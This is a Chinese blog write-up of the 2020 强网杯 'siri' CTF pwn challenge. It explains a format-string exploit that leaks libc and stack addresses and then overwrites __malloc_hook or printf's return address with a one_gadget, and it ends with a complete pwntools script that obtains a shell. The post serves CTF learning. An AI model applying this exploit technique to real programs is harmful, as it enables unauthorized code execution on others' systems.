[PWN] 强网杯2020siri 手撸格式化字符串 劫持hook/返回地址

已于 2023-09-23 17:29:11 修改
阅读量237 收藏 1
点赞数 1
分类专栏: PWN 技巧 文章标签: linux 安全
于 2023-09-21 19:15:53 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_55700752/article/details/133136387
版权
PWN 同时被 2 个专栏收录
13 篇文章 0 订阅
订阅专栏
技巧
8 篇文章 0 订阅
订阅专栏

星盟安全格式化字符串漏洞利用中的一道例题

本地环境位于Ubuntu22.04

checksec:
保护全开,无法劫持got表
在这里插入图片描述
IDA:
在这里插入图片描述
在这里插入图片描述
sub_1212函数存在格式化字符串漏洞,不存在栈溢出,触发过程如下:
发送"Hey Siri!"==>发送"Remind me to " + payload
思路
1.劫持__malloc_hook或者__free_hook函数地址为onegadget,最后printf打印大量字符调用malloc
在这里插入图片描述
在这里插入图片描述

2.修改printf函数的返回地址为onegadget

方法一:劫持__malloc_hook

onegadget

获取onegadget相对于libc基址的偏移,注意使用条件
在这里插入图片描述

获取libc基址

利用格式化字符串漏洞打印'__libc_start_main'函数真实地址,减去函数偏移即可得到libc基址
基址加上'__malloc_hook'函数的偏移即可得到'__malloc_hook'函数真实地址
基址加上onegadget的偏移即可得到onegadget真实地址,

libc_base = int(rc(14),16) - 128 - libc.symbols['__libc_start_main']
malloc_hook = libc_base + libc.symbols['__malloc_hook']
one_gadget = libc_base + 0xebcf5
如何打印'__libc_start_main'函数真实地址

利用%n$p,下断点 b printf ,
当断在sub_1212函数的printf处时,stack 100查看栈内容
在这里插入图片描述
利用fmtarg命令查看'__libc_start_main+128'函数地址在栈上相对于printf是第几个参数
因此输入%103$p即可获得'__libc_start_main+128'地址,减去128即为'__libc_start_main+128'函数真实地址

格式化字符串劫持__malloc_hook函数地址

利用"%{}c%{}$hn".format(target_size,address)修改指定地址的内容为目标大小,每次写2个字节,64位地址一共6个字节,需要写3次
在这里我们需要将'__malloc_hook'函数的地址修改为onegadget地址,即将下图红框内容修改为onegadget
在这里插入图片描述
第一次写最后2个字节,第二次中间两个字节,第三次写前面2个字节
![在这里插入图片描述](https://img-blog.csdnimg.cn/7c95cd61495947dca18d1d962f73f527.png
写地址脚本如下:

write_size = 0
offset = 55
payload = ''
for i in range(3):
    num = (one_gadget >> 16*i) & 0xffff
    num -= 27
    if(num > write_size&0xffff):
        payload += "%{}c%{}$hn".format(num - (write_size&0xffff),offset + i)
        write_size += num - write_size&0xffff
    else:
        payload += "%{}c%{}$hn".format(0x10000 + num - (write_size&0xffff),offset + i)
        write_size += 0x10000 + num - (write_size&0xffff)
# 凑偏移 55
payload = bytes(payload.encode('utf-8'))
payload = payload.ljust(0x38-13,b'a')
for i in range(3):
    payload += p64(malloc_hook + i*2)

num -= 27是因为printf(">>> OK, I’ll remind you to " + payload)格式化字符串时,">>> OK, I'll remind you to "有27个字节
payload.ljust(0x38-13,b’a’):
-13是因为send字符串时要以"Remind me to "开头,有13个字节;
ljust(0x38-13,b’a’)是因为凑齐55的偏移,确定要修改的地址是printf的第几个参数(只要可以对应上,可以是其他的偏移)
在这里插入图片描述
在这里插入图片描述

注意写地址的大小

在这里插入图片描述
在这里插入图片描述

结果

在这里插入图片描述

劫持'__malloc_hook'前:
在这里插入图片描述
劫持'__malloc_hook'后:
在这里插入图片描述
可以看到劫持'__malloc_hook'的地址已经被劫持为onegadget的地址x7f04aa700cf5
最后发送大量内容%99999c导致printf调用malloc分配缓冲区

siri(b"%99999c")

但是不知道什么原因呢无法触发,可能是因为onegadget的条件没有满足

方法二:劫持返回地址

进入printf函数后查看返回地址,即为rsp,可以通过泄露栈上地址减去相对偏移的方式得到存储返回地址的栈地址
在这里插入图片描述
这里选择泄露%7$p处的地址
在这里插入图片描述
代码如下

siri(b"%7$p")
rcu(b">>> OK, I'll remind you to ")
rsp = int(rc(14),16) - 0x158
lg("rsp",rsp)

修改地址的方式和劫持malloc_hook一样,只需要将待修改的地址改为rsp即可

for i in range(3):
    payload += p64(rsp + i*2)

劫持返回地址不需要发送大量内容去触发,成功获得shell
在这里插入图片描述

代码如下:

from pwn import *
from LibcSearcher import *
context.log_level = 'debug'
from time import *

sd      = lambda payload        : p.send(payload)
sdl     = lambda payload        : p.sendline(payload)
sda     = lambda data,payload   : p.sendafter(data,payload)
sdla    = lambda data,payload   : p.sendlineafter(data,payload)
it      = lambda                : p.interactive()
rc      = lambda num            : p.recv(num)
rc_all  = lambda                : p.recv()
rcu     = lambda data           : p.recvuntil(data)
lbc     = lambda str1,str2      : LibcSearcher(str1,str2)
lg      = lambda name,data      : p.success("\033[1;31m%s\033[0m --> 0x%x" % (name,data))
get_addr_64 = lambda: u64(rcu(b"\x7f")[-6:].ljust(8,b"\x00"))

def db():
    gdb.attach(p)
    pause()
 
def dbs(src):
    gdb.attach(p, src)

# siri
p =process("./siri")
elf = ELF("./siri")
libc = ELF("./libc.so.6")
def siri(payload):
    rcu(b">>> ")
    sdl(b"Hey Siri!")
    rcu(b"you?\n>>> ")
    sdl(b"Remind me to " + payload)
# dbs("b printf")

# siri(b"%45$p")
# rcu(b"0x")
# canary = int(rc(16),16)

## __libc_start_call_main+128 : %83$p
## __libc_start_main+128 : %103$p
siri(b"%103$p")
rcu(b">>> OK, I'll remind you to ")
libc_base = int(rc(14),16) - 128 - libc.symbols['__libc_start_main']
malloc_hook = libc_base + libc.symbols['__malloc_hook']
one_gadget = libc_base + 0xebcf5
lg("libc_base",libc_base)
lg("malloc_hook",malloc_hook)
lg("one_gadget",one_gadget)

siri(b"%7$p")
rcu(b">>> OK, I'll remind you to ")
rsp = int(rc(14),16) - 0x158
lg("rsp",rsp)

write_size = 0
offset = 55
payload = ''
for i in range(3):
    num = (one_gadget >> 16*i) & 0xffff
    num -= 27
    if(num > write_size&0xffff):
        payload += "%{}c%{}$hn".format(num - (write_size&0xffff),offset + i)
        write_size += num - write_size&0xffff
    else:
        payload += "%{}c%{}$hn".format(0x10000 + num - (write_size&0xffff),offset + i)
        write_size += 0x10000 + num - (write_size&0xffff)
# 凑偏移 55
payload = bytes(payload.encode('utf-8'))
payload = payload.ljust(0x38-13,b'a')
for i in range(3):
    payload += p64(rsp + i*2)
siri(payload)
# sleep(0.1)
# siri(b"%99999c")
it()
看海就会失去海
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
专栏目录
PWN 强网杯2020siri 题目
09-21
PWN 强网杯2020siri 题目
强网杯2022 pwn 赛题解析.docx
12-18
强网杯2022 Pwn赛题解析】 在网络安全竞赛“强网杯”中,Pwn类赛题往往考验参赛者对内存安全漏洞利用的理解和技术应用。本题涉及的是一道基于高版本glibc的House of Apple攻击,这是一种利用大型bin(large bin)...
强网杯-[强网先锋]-Siri
m0_55906008的博客
09-21 154
hey,siri
2020强网杯Siri记录
qq_39153421的博客
03-15 760
题目检查 checksec检查,保护全开。ida看下函数功能,发现sub_1212函数有格式化字符串漏洞: __int64 __fastcall sub_1212(const char *a1) { char *v2; // [rsp+18h] [rbp-128h] char s[280]; // [rsp+20h] [rbp-120h] BYREF unsigned __int64 v4; // [rsp+138h] [rbp-8h] v4 = __readfsqword(0x28u);
格式化字符串漏洞
2301_79880752的博客
02-04 785
开启NX、Canary保护,64位,动态编译,IDA分析:很明显存在格式化字符串漏洞,同时左边还有__stack_chk_fail函数随机生成canary被改变后会退出程序,那它如何退出的呢,就是通过执行__stack_chk_fail函数退出程序既然题目给了我们__stack_chk_fail函数的地址,又存在格式化字符串漏洞,那我们就可以通过fmtstr_payload(偏移,{被修改的got表:改之后的地址})
栈上格式化字符串漏洞:泄露canary,修改got表,stack check fail,one_gadget
2302_79813730的博客
02-05 553
此时就存在格式化字符串漏洞。%c为单个字符形式%s为多个字符形式%d为数字形式%f是转为浮点型%x是转为十六进制形式,不带0x%p是转为十六进制,但是带0x%n 将%n之前打印出来的字符的个数存入到参数中接下通过例题来讲解利用方法。
2020强网杯Siri题wp
sln_1550的博客
08-27 734
漏洞点在sub_1212函数,printf(%s)造成格式化漏洞 思路是先通过格式化漏洞打印出程序基址和LIBC基址,然后修改free_hook为onegadget,再打印大量数据即可 最终的exp如下: #coding:utf8 from pwn import * #context.log_level = "debug" x=0 while(1): # p = process("./Siri") p = remote('123.56.170.202', 12124) p.recvuntil(
CTF PWN-攻防世界CGfsb格式化字符串漏洞
道阻且长,行则将至。
07-23 1825
距离 2021 年年底短暂接触学习 CTF PWN 相关知识(CTF PWN-攻防世界XCTF新区WriteUp)已经是快 2 年前的事了,这期间就连攻防世界社区的站点都发生巨大变化了……为了学习终端领域底层漏洞的挖掘和利用技术,继续积累 PWN 相关知识。
[pwn]格式化字符串全自动exp!!!
mid2dog
05-14 2116
前言 格式化字符串一把梭真的好爽!!!!!! 再也不用绞尽脑汁去gdb调试多少个字节和几位了!! 呜呜呜,花了一个通宵把这一系列搞定,喜极而泣,特此记录 以前的我做这类题心理状态: 现在的我: 总之就是非!常!爽! 这里我用的例题是 [第五空间2019决赛] 里的pwn5,考察到的知识是单纯的格式化字符串格式化字符串原理及利用 原理就不赘述啦,详情参考ctfwiki上的内容 或者搜索下,其他很多大佬写的文章都超级棒!! 利用的话,如下: 利用格式化字符串的漏洞,一般会有如下几种操作: 泄露栈内存
强网杯 WriteUp By Nu1L
08-02
Pwn类题目中,参赛者通常需要利用程序中的缓冲区溢出、格式字符串漏洞、整数溢出等安全漏洞来实现远程代码执行(RCE)。例如,`a000`到`a101`一系列的函数可能是为了模拟不同类型的漏洞场景,供选进行分析和...
【天格】战队-未解出题目附件-第六届“强网杯”全国网络安全挑战赛
08-01
【天格】战队在第六届“强网杯”全国网络安全挑战赛中分享了多个未解出的题目附件,这些附件涵盖了网络安全领域的多个子领域,包括逆向工程、漏洞利用(PWN)、密码学(Crypto)以及杂项(Misc)。通过分析这些文件...
网鼎杯2020半决赛awdplus题目
12-07
"网鼎杯2020半决赛awdplus题目"是一个针对网络安全竞赛的专题,主要涉及的是Pwn(破解)和Web(网页安全)两类挑战。这类比赛通常旨在测试参赛者的逆向工程、代码审计、漏洞利用以及网络攻防技能。下面我们将详细...
Linux中的环境变量
qhy850716的博客
07-17 426
我们思考这样一个问题:指令也是可执行程序,我们写好的编译好的c语言也是程序,为什么我们在执行c语言程序时要./a.out带上当前路径,而ls这种指令就不要带路径呢?这就是环境变量PATH的作用,Linux中存在一些全局设置,表明命令行解释器应该去哪个路径下寻找可执行程序。系统中的很多配置在我们登录Linux时就已经被加载到bash中了,也就是内存。
LINUX:懒汉单例模式线程池
W2155的博客
07-16 479
创建一个线程,就是要这个线程去完成某种任务的。池化技术就是,提前创建一批线程,有任务这一批线程就会执行。而不是有任务的时候在去创建线程。池化技术有着更高的效率,因为线程都是提前创建好的,直接执行任务。
Qmi8658a姿态传感器使用心得(2)linux
最新发布
Starry的博客
07-19 945
COD 原理,CTRL9,自检(详细代码示例)
Linux杂货铺】期末总结篇4:shell编程
聆风吟的博客
07-17 4141
本文主要分享作者本人期末复习的总结,欢迎大家借鉴浏览。
linux centos nginx 报错 client intended to send too large body: 104853014 bytes问题
qq_42250832的博客
07-17 329
这个错误通常发生在Web服务器处理HTTP请求时,当客户端尝试发送的请求体(body)大小超过了服务器配置的限制时。错误信息 “client intended to send too large body: 104853014 bytes” 表示客户端想要发送的数据量超过了100MB,这通常是由于客户端尝试上传一个非常大的文件或者提交了一个非常大的表单。增加服务器接收请求体的大小限制。这通常可以通过配置文件来实现,例如,如果你使用的是Nginx,可以修改client_max_body_size指令。
文件在Linux下为binary格式在Windows下为utf-8格式
qq_38220334的博客
07-17 337
想着是不是之前遇到的问题,有可能是文件中含有特殊字符,然后用vim命令来编辑这个文件,发现,还真是含有一个特殊字符,然后将它删除掉,文件就变成utf-8格式的文件了。在Windows下和Mac下都是没有问题的,在华为云服务器上也是没问题的(操作系统不是centos),但是在自己搭建的Linux服务器(centos)上是有问题的。用shell或者Python脚本去将这个文件转为utf-8格式的,但是都失败了。
pwn格式化字符串漏洞
08-30
pwn中的格式化字符串漏洞是指通过向程序输入格式化字符串,然后利用程序内部的输出函数来读取或修改内存中的数据。这种漏洞会导致程序的安全性受到威胁,攻击者可以利用该漏洞执行任意代码或者获取敏感信息。 格式...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值